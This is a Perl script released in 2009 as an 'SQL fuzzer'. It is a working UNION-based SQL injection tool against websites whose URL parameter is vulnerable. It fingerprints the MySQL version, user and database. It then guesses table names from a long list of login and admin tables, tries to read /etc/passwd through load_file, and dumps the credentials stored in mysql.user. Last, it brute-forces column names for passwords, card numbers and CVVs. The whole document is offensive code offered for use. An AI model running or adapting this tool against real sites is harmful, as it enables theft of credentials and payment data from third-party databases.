#!/usr/bin/perl

###########################################################
#
#
#    SQL fuzzer by stefo... [stefo@cia.com]
#    Thanks to: d14l and baltazar
#
#    Greetz goes to all ljuska.org members =)
#    Date of release: 06.03.2009
#
###########################################################

use LWP::UserAgent;
use HTTP::Request;

print "Enter URL of vulnerable site along with vuln script(eg: http://site.com/news.php?id=)\n";
$url = <STDIN>;
chop($url);
print "Enter column number:\n";
$broj = <STDIN>;
chop($broj);
print "Enter number of vulnerable column:\n";
$vuln = <STDIN>;
chop($vuln);

for($i=1; $i<$broj; $i++) {
$num .= $i . ",";
}
chop($num);

@tabele = ('domini','abbonamenti','phpss_account','user','users','tbladmins','Logins','logins','login','admins','members','member', '_wfspro_admin', '4images_users', 'a_admin', 'account', 'accounts', 'adm', 'admin', 'admin_login', 'admin_user', 'admin_userinfo', 'administer', 'administrable', 'administrate', 'administration', 'administrator', 'administrators', 'adminrights', 'admins', 'adminuser','adminusers','article_admin', 'articles', 'artikel','author', 'autore', 'backend', 'backend_users', 'backenduser', 'bbs', 'book', 'chat_config', 'chat_messages', 'chat_users', 'client', 'clients', 'clubconfig', 'company', 'config', 'contact', 'contacts', 'content', 'control', 'cpg_config', 'cpg132_users', 'customer', 'customers', 'customers_basket', 'dbadmins', 'dealer', 'dealers', 'diary', 'download', 'Dragon_users', 'e107.e107_user', 'e107_user', 'forum.ibf_members', 'fusion_user_groups', 'fusion_users', 'group', 'groups', 'ibf_admin_sessions', 'ibf_conf_settings', 'ibf_members', 'ibf_members_converge', 'ibf_sessions', 'icq', 'index', 'info', 'ipb.ibf_members', 'ipb_sessions', 'joomla_users', 'jos_blastchatc_users', 'jos_comprofiler_members', 'jos_contact_details', 'jos_joomblog_users', 'jos_messages_cfg', 'jos_moschat_users', 'jos_users', 'knews_lostpass', 'korisnici', 'kpro_adminlogs', 'kpro_user', 'links', 'login_admin', 'login_admins', 'login_user', 'login_users','logon', 'logs', 'lost_pass', 'lost_passwords', 'lostpass', 'lostpasswords', 'm_admin', 'main', 'mambo_session', 'mambo_users', 'manage', 'manager', 'mb_users','memberlist','minibbtable_users', 'mitglieder', 'mybb_users', 'mysql', 'name', 'names', 'news', 'news_lostpass', 'newsletter', 'nuke_users', 'obb_profiles', 'order', 'orders', 'parol', 'partner', 'partners', 'passes', 'password', 'passwords', 'perdorues', 'perdoruesit', 'phorum_session', 'phorum_user', 'phorum_users', 'phpads_clients', 'phpads_config', 'phpbb_users', 'phpBB2.forum_users', 'phpBB2.phpbb_users', 'phpmyadmin.pma_table_info', 'pma_table_info', 'poll_user', 'punbb_users', 'pwd', 'pwds', 'reg_user', 'reg_users', 'registered', 'reguser', 'regusers', 'session', 'sessions', 'settings', 'shop.cards', 'shop.orders', 'site_login', 'site_logins', 'sitelogin', 'sitelogins', 'sites', 'smallnuke_members', 'smf_members', 'SS_orders', 'statistics', 'superuser', 'sysadmin', 'sysadmins', 'system', 'sysuser', 'sysusers', 'table', 'tables', 'tb_admin', 'tb_administrator', 'tb_login', 'tb_member', 'tb_members', 'tb_user', 'tb_username', 'tb_usernames', 'tb_users', 'tbl', 'tbl_user', 'tbl_users', 'tbluser', 'tbl_clients', 'tbl_client', 'tblclients', 'tblclient', 'test', 'usebb_members','user_admin', 'user_info', 'user_list', 'user_login', 'user_logins', 'user_names', 'usercontrol', 'userinfo', 'userlist', 'userlogins', 'username', 'usernames', 'userrights','vb_user', 'vbulletin_session', 'vbulletin_user', 'voodoo_members', 'webadmin', 'webadmins', 'webmaster', 'webmasters', 'webuser', 'webusers','wp_users', 'x_admin', 'xar_roles', 'xoops_bannerclient', 'xoops_users', 'yabb_settings', 'yabbse_settings', 'Category', 'CategoryGroup', 'ChicksPass', 'dtproperties', 'JamPass', 'News', 'Passwords by usage count', 'PerfPassword', 'PerfPasswordAllSelected','pristup', 'SubCategory', 'tblRestrictedPasswords', 'Ticket System Acc Numbers', 'Total Members', 'UserPreferences', 'tblConfigs', 'tblLogBookAuthor', 'tblLogBookUser', 'tblMails', 'tblOrders', 'tblUser', 'cms_user', 'cms_users', 'cms_admin', 'cms_admins', 'user_name', 'jos_user', 'table_user', 'email', 'mail', 'bulletin', 'login_name', 'admuserinfo', 'userlistuser_list', 'SiteLogin', 'Site_Login', 'UserAdmin');

@kolone = ('PasswordFTP','NomeUtenteFTP','ftp_user','korisnicko_ime','user', 'username', 'password', 'passwd', 'pass', 'cc_number', 'id', 'email', 'emri', 'fjalekalimi', 'pwd', 'user_name', 'customers_email_address', 'customers_password', 'user_password', 'name', 'user_pass', 'admin_user', 'admin_password', 'admin_pass', 'usern', 'user_n', 'users', 'login', 'logins', 'login_user', 'login_admin', 'login_username', 'user_username', 'user_login', 'auid', 'apwd', 'adminid', 'admin_id', 'adminuser', 'adminuserid', 'admin_userid', 'adminusername', 'admin_username', 'adminname', 'admin_name', 'usr', 'usr_n', 'usrname', 'usr_name', 'usrpass', 'usr_pass', 'usrnam', 'nc', 'uid', 'userid', 'user_id', 'myusername', 'mail', 'emni', 'logohu', 'punonjes', 'kpro_user', 'wp_users', 'emniplote', 'perdoruesi', 'perdorimi', 'punetoret', 'logini', 'llogaria', 'fjalekalimin', 'kodi', 'emer', 'ime', 'korisnik', 'korisnici', 'user1', 'administrator', 'administrator_name', 'mem_login', 'login_password', 'login_pass', 'login_passwd', 'login_pwd', 'sifra', 'lozinka', 'psw', 'pass1word', 'pass_word', 'passw', 'pass_w', 'user_passwd', 'userpass', 'userpassword', 'userpwd', 'user_pwd', 'useradmin', 'user_admin', 'mypassword', 'passwrd', 'admin_pwd', 'admin_passwd', 'mem_password', 'memlogin', 'e_mail', 'usrn', 'u_name', 'uname', 'mempassword', 'mem_pass', 'mem_passwd', 'mem_pwd', 'p_word', 'pword', 'p_assword', 'myname', 'my_username', 'my_name', 'my_password', 'my_email', 'korisnicko', 'cvvnumber ', 'about', 'access', 'accnt', 'accnts', 'account', 'accounts', 'admin', 'adminemail', 'adminlogin', 'adminmail', 'admins', 'aid', 'aim', 'auth', 'authenticate', 'authentication', 'blog', 'cc_expires', 'cc_owner', 'cc_type', 'cfg', 'cid', 'clientname', 'clientpassword', 'clientusername', 'conf', 'config', 'contact', 'converge_pass_hash', 'converge_pass_salt', 'crack', 'customer', 'customers', 'cvvnumber', 'data', 'db_database_name', 'db_hostname', 'db_password', 'db_username', 'download', 'e-mail', 'emailaddress', 'full', 'gid', 'group', 'group_name', 'hash', 'hashsalt', 'homepage', 'icq', 'icq_number', 'id_group', 'id_member', 'images', 'index', 'ip_address', 'last_ip', 'last_login', 'lastname', 'log', 'login_name', 'login_pw', 'loginkey', 'loginout', 'logo', 'md5hash', 'member', 'member_id', 'member_login_key', 'member_name', 'memberid', 'membername', 'members', 'new', 'news', 'nick', 'number', 'nummer', 'pass_hash', 'passwordsalt', 'passwort', 'personal_key', 'phone', 'privacy', 'pw', 'pwrd', 'salt', 'search', 'secretanswer', 'secretquestion', 'serial', 'session_member_id', 'session_member_login_key', 'sesskey', 'setting', 'sid', 'spacer', 'status', 'store', 'store1', 'store2', 'store3', 'store4', 'table_prefix', 'temp_pass', 'temp_password', 'temppass', 'temppasword', 'text', 'un', 'user_email', 'user_icq', 'user_ip', 'user_level', 'user_passw', 'user_pw', 'user_pword', 'user_pwrd', 'user_un', 'user_uname', 'user_usernm', 'user_usernun', 'user_usrnm', 'userip', 'userlogin', 'usernm', 'userpw', 'usr2', 'usrnm', 'usrs', 'warez', 'xar_name', 'xar_pass');

$ver = $url . "9999+and+1=2+union+all+select+" . $num . "," . $broj . "--";
$ver =~ s/$vuln/concat(0x3a,0x3a,0x3a,version(),0x3a,user(),0x3a,database(),0x3a,0x3a,0x3a)/;
$zahtjev = HTTP::Request->new(GET=>$ver);
$ua = LWP::UserAgent->new();
$odgovor = $ua->request($zahtjev);
if($odgovor->is_success) {
if($odgovor->content=~ /:::(.+):(.+):(.+):::/) {

print "\nMySQL version: " . $1 . "\n";
print "Username: " . $2 . "\n";
print "Database: " . $3 . "\n\n";
print "Tables:\n";
}
}

foreach $tab(@tabele) {

$sql = $url . "-9999+union+all+select+" . $num . "," . $broj . "+from+" . $tab . "--";
$sql =~ s/$vuln/0x7e737465666f7e/;
$zahtjev = HTTP::Request->new(GET=>$sql);
$ua = LWP::UserAgent->new();
$odgovor = $ua->request($zahtjev);

if($odgovor->is_success) {
if($odgovor->content=~ /~stefo~/) {

print $tab . "\n";

}
}

}

print "\nTrying load_file...\n\n";
$sql = $url . "-9999+union+all+select+" . $num . "," . $broj . "--";
$sql =~ s/$vuln/~0x2f6574632f706173737764~/;
$zahtjev = HTTP::Request->new(GET=>$sql);
$ua = LWP::UserAgent->new();
$odgovor = $ua->request($zahtjev);

if($odgovor->is_success) {
if($odgovor->content=~ /~root:x(.+)~/) {

print $1 . "\n";

}
else {
print "Unfortunately,load_file() isn't possible to perform.\n\n";
}
}

print "Trying to load mysql.user...\n\n";
$mysql = $url . "-9999+union+all+select+" . $num . "," . $broj . "+from+mysql.user--";
$mysql =~ s/$vuln/concat(0x3a,0x3a,0x3a,user,0x3a,password,0x3a,0x3a,0x3a)/;
$zahtjev = HTTP::Request->new(GET=>$mysql);
$ua = LWP::UserAgent->new();
$odgovor = $ua->request($zahtjev);

if($odgovor->is_success) {
if($odgovor->content=~ /:::(.+):(.+):::/) {

print "MySQL username: $1\nMySQL password: $2\n\n";

}
else {
print "Loading mysql.user failed.\n\n";
}
}

print "To serach for columns in some table,specify table's name here...\nTable name: ";
$kol = <STDIN>;
chop($kol);
print "\n";

foreach $kolona(@kolone) {

$fuzz = $url . "-9999+union+all+select+" . $num . "," . $broj . "+from+" . $kol . "--";
$fuzz =~ s/$vuln/concat(0x3a,0x3a,0x3a,$kolona,0x3a,0x3a,0x3a)/;
$zahtjev = HTTP::Request->new(GET=>$fuzz);
$ua = LWP::UserAgent->new();
$odgovor = $ua->request($zahtjev);

if($odgovor->is_success) {
if($odgovor->content=~ /:::(.+):::/) {

print "Column value " . $kolona . ":\n";
print $1 . "\n";

}
}

}

print "\nFuzzing is over. For better results,add new table's and column's names. Thanks for using.";